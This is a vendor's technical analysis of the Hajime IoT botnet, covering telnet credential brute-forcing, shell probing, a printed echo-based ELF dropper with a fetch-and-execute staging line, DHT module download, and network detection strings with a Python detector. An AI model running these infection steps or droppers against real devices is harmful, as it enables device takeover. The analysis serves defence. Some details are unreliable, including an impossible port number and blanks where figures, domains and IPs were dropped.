Hajime sample technical analysis report

Posted by tzul at 2020-02-26


With the rapid development of science and technology, the number of IoT devices keeps increasing. While these devices bring convenience, they also bring security risks. This has opened a huge market to lawbreakers, all of whom want to profit from it. Just as the well-known Mirai came to dominate the scene, a newcomer named Hajime appeared and took a large share of that market.


Hajime is similar to Mirai in that it targets devices with an open remote-login port and logs in using default user names and passwords. The difference is that Hajime is built on a peer-to-peer network, and command modules are propagated to the corresponding endpoints through the controller, so the network it controls is more stable and new functions can be added at any time.

Executive summary

Hajime scans port 23 (the telnet port) of random IP addresses. Once it finds an IP that accepts the connection, it tries to log in with the user names and passwords embedded in the sample. Infection starts after a successful login. In the second stage, it joins the peer-to-peer network to obtain the configuration file and the scanner. The scanner then scans for other vulnerable devices to infect, expanding the scope of control.

Behavior description

Infective stage

Hajime scans randomly generated IPv4 addresses and tries to connect to port 23 on each. If the connection succeeds, it tries to log in with common user names and passwords.

Some user names and passwords are shown in the figure below, and see the appendix for details:

Once the login is successful, Hajime attempts to access the Linux shell by sending the following commands:

The enable command is a privileged command, and the shell and sh commands indicate an attempt to run the Bourne shell. If any of these commands fails, Hajime's attempt to access the Linux shell fails.

Once Hajime confirms that it has a shell on the target device, it begins to analyze the device. First, it checks the mounted file systems of the target for a writable location.

It uses the /bin/busybox command repeatedly in order to locate the end of the command output, a technique it shares with Mirai.

Hajime looks for a writable path to use as its working directory for executing commands, and it avoids the paths /proc, /sys and /.

Through these lines of code, Hajime detects whether the next-stage binary already exists and whether the current working directory is writable, and finally retrieves the /bin/echo binary so that it can determine the processor architecture of the target from its header. Once the processor is determined, Hajime begins the next phase of code execution:

echo -ne [...]x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" > .s; /bin/busybox %s
echo -ne [...]x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s; /bin/busybox %s
echo -ne [...]x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s; /bin/busybox %s
echo -ne [...]\x00\xef\x02\x00\x12\x1c\xc6\x33\x64\x7b\x41\x2a\x00\x00\x00\x61\x65\x61" >> .s; /bin/busybox %s
echo -ne [...]x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75" >> .s; /bin/busybox %s
echo -ne [...]x00" >> .s; /bin/busybox %s
echo -ne [...]x00" >> .s; /bin/busybox %s
echo -ne [...]x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s; /bin/busybox %s
# cp .s .i; >.i; ./.s>.i; ./.i; rm .s; /bin/busybox %s

This binary connects to the attacker and writes the data it receives to standard output, which is redirected into the .i file and then executed. The IP and port that this module connects to are hard-coded in the program rather than passed on the command line. The attack code therefore needs to know the offset of the embedded sockaddr_in structure for each payload and each platform.

DHT Downloader

The code in this stage obtains additional payloads over the P2P network, reached through the connection established to the attacker, and executes them. Hajime uses the BitTorrent DHT protocol for connection and the uTorrent Transport Protocol for data exchange.


The main flow of this phase starts from the functions conf init and conf check, which dynamically allocate and initialize the main configuration structure of kadnode.

First, it does some initialization work and creates a symbolic link:

Then it calls the system function mprotect to change the memory protection:

The domain name strings needed in later stages can be seen in the program's memory space:

The sample will try to visit for NTP query, and take the query result as the offset of local system time.

If the query fails, it uses the current system time instead.

It hides its behavior by spawning child processes:

Using the time information obtained from the NTP server, combined with the information read from /proc/net/route, it communicates with neighboring nodes:

It deletes itself to avoid discovery:

It uses iptables to set up the network and deletes the rule named "cwmp_cr" in the INPUT chain.

A FIFO file is created to store data during P2P communication.

It looks for the configuration folder .p/.d, which holds the configuration files left by the old version after an automatic update. If this directory exists, its configuration files are used. If it does not exist, a directory is created to store the downloaded configuration files and module files.

Finally, control passes to the function main start, which initializes the DHT, sets the main network handler, and starts the main network loop.

Main operation logic

After reading the current configuration file and establishing peer relationships in the DHT, Hajime retrieves the latest configuration file from it.

A peer lookup in the BitTorrent DHT requires a 160-bit "info" value. BitTorrent uses the SHA1 value of the torrent's metadata for the lookup. Hajime has no torrent metadata, so the "info" value is obtained by the following algorithm:

For example, if the file name downloaded by Hajime is "example" and the date is 2016-10-1, the time is first written as 1-9-116-6-274, then -c3499c272730a7f807efb8676a92dcb6f8a3f8f is appended, and finally the DHT is searched to find 5dfd959c78d359272d46afd2e3069b34a9455ffd.

Hajime uses the above algorithm to search for "config" and download the configuration file. The configuration file is downloaded and parsed every ten minutes. The configuration file downloaded during this debugging session is as follows:


Hajime downloads the samples in the module list that match the platform. Once a download is complete, the file is cached in the .p folder and its "type" field is checked. A value of 0x01 indicates a phase 2 update file, which causes the currently running phase 2 program to write its current configuration file to .p/.d. Other types indicate that the binary is an executable or a module file.

The purpose of Hajime

When Hajime was discovered, it already controlled a large number of IoT devices but had never launched any DDoS attack, so the attackers' purpose in hijacking the devices was unknown. After Hajime is installed on a device, it closes ports 2375555 and 5358. The command format is as follows:

These are ports through which IoT devices can be attacked. Closing them really does improve the security of the device. From this point of view there is no malice, but the aim may also be to keep other malicious programs from competing with it for resources. Hajime has not carried out DDoS attacks so far, which may mean that the attacker is still trying to expand the range of devices under control. When the time is right, the attacker may sell the DDoS service to others.

However, it cannot be concluded that Hajime is a malicious program, because it has not launched a DDoS attack so far. After the program runs, it outputs the following information to the terminal:

In this message, the author presents himself as a white hat securing some systems. So we cannot rule out that the author of Hajime is indeed a white hat who is merely spreading this sample as a research project or out of interest.

Differences from Mirai

In the infection stage, Hajime reads the user names and passwords in list order when trying to log in, while Mirai picks a pair at random. When probing for a shell with commands, Hajime does not use the system command to verify and access the shell.

Devices affected by Mirai receive commands through C&C communication, while Hajime communicates over a P2P network, which makes the botnet less centralized and harder to stop.

Hajime affects a smaller set of devices, namely IoT devices built on ARM chips, while Mirai affects devices built on ARM, MIPS, x86 and six other platforms. Hajime also curbed the spread of Mirai to some extent.

Attack location

The domain names the sample connects to are normal uTorrent domain names used by the P2P protocol, so they cannot be treated as attack domain names. The IP addresses the domain names resolve to are as follows:

The IP corresponding to is

The IP corresponding to is

Test method

1. Hajime infects devices by logging in over telnet. After a successful login, it sends the string enable\r\nshell\r\nsh\r\n.

For example:

0000002D  65 6e 61 62 6c 65 0d 0a  73 68 65 6c 6c 0d 0a 73   enable.. shell..s
0000003D  68 0d 0a                                           h..

It also sends the string "cat /proc/mounts; /bin/busybox %s\r\n", where %s is a random string of 5 uppercase letters.

For example:

00000040  63 61 74 20 2f 70 72 6f  63 2f 6d 6f 75 6e 74 73   cat /pro c/mounts
00000050  3b 20 2f 62 69 6e 2f 62  75 73 79 62 6f 78 20 4c   ; /bin/b usybox L
00000060  47 42 4c 55 0d 0a                                  GBLU..

The presence of the bot can therefore be confirmed by matching these strings.

2. The sample opens port 11152 and sends data over UDP. Because the port number is fixed, the bot can be confirmed by detecting this port number.
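The two checks above can be applied to captured traffic as follows. This is an added example, not code from the original report: the class and function names, the buffer cap and the segment boundaries of the sample are assumptions, and the sample bytes are constructed from the hexdumps above.

```python
import re

# Markers from the test method above (client-to-server bytes on TCP/23).
SHELL_PROBE = b"enable\r\nshell\r\nsh\r\n"
MOUNT_PROBE = re.compile(rb"cat /proc/mounts; /bin/busybox ([A-Z]{5})\r\n")
HAJIME_UDP_PORT = 11152
MAX_BUFFER = 4096  # assumption: bytes of stream tail kept per flow


class TelnetFlowScanner:
    """Scans one telnet flow; names and structure are hypothetical."""

    def __init__(self):
        self.buf = b""
        self.shell_probe = False
        self.token = None  # the 5-letter busybox marker, once seen

    def feed(self, segment: bytes) -> None:
        # Match on the reassembled stream, since a marker can be split
        # across TCP segments; keep only a bounded tail of the data.
        self.buf = (self.buf + segment)[-MAX_BUFFER:]
        if SHELL_PROBE in self.buf:
            self.shell_probe = True
        match = MOUNT_PROBE.search(self.buf)
        if match:
            self.token = match.group(1).decode("ascii")

    def is_hajime(self) -> bool:
        # Require both strings; either one alone is weaker evidence.
        return self.shell_probe and self.token is not None


def udp_port_matches(src_port: int, dst_port: int) -> bool:
    """Second check: UDP traffic on the fixed port 11152."""
    return HAJIME_UDP_PORT in (src_port, dst_port)


# Constructed sample: the bytes of the two hexdumps above, split at the
# dump's row boundaries to imitate segmentation (an assumption).
SAMPLE_SEGMENTS = [bytes.fromhex(h) for h in (
    "656e61626c650d0a7368656c6c0d0a73", "680d0a",
    "636174202f70726f632f6d6f756e7473",
    "3b202f62696e2f62757379626f78204c", "47424c550d0a",
)]


def scan(segments) -> TelnetFlowScanner:
    scanner = TelnetFlowScanner()
    for segment in segments:
        scanner.feed(segment)
    return scanner
```

Feeding the scanner the client-to-server payloads of a port 23 flow in order yields the random 5-letter marker in `token`, which can be logged alongside the alert.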


Mirai before it and now Hajime have shown that the security of the Internet of Things is a problem that cannot be ignored and needs to be solved urgently. While we want manufacturers to improve the security of their products, users should also improve their security awareness and take certain protective measures.

Before buying IoT devices, first understand the performance and security functions of the devices. Turn off unnecessary functions and services, disable telnet login and use SSH where possible, audit the IoT devices used in the network, and change the default settings on the devices. Use strong passwords for device accounts and WiFi networks. When setting up WiFi Protected Access (WPA), use a strong encryption method. Unless it is necessary, disable the router's Universal Plug and Play function. Modify the default privacy and security settings of IoT devices according to your own needs. If remote access to IoT devices is not needed, disable or protect it. Prefer wired connections to wireless connections, and upgrade firmware regularly. I believe that these measures can greatly improve the security of the equipment.


Statement

This security notice is only used to describe possible security problems. Lvmeng Technology does not provide any guarantee or commitment for this security notice. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this security notice shall be borne by the user, and Lvmeng Technology and the author of the security notice shall not bear any responsibility for them. Lvmeng Technology has the right to modify and interpret this security notice. If you want to reprint or disseminate the security notice, you must preserve its integrity, including the copyright notice and other contents. Without the permission of Lvmeng Technology, it is not allowed to modify, add to or remove from the contents of this security notice, and it may not be used for commercial purposes in any way.
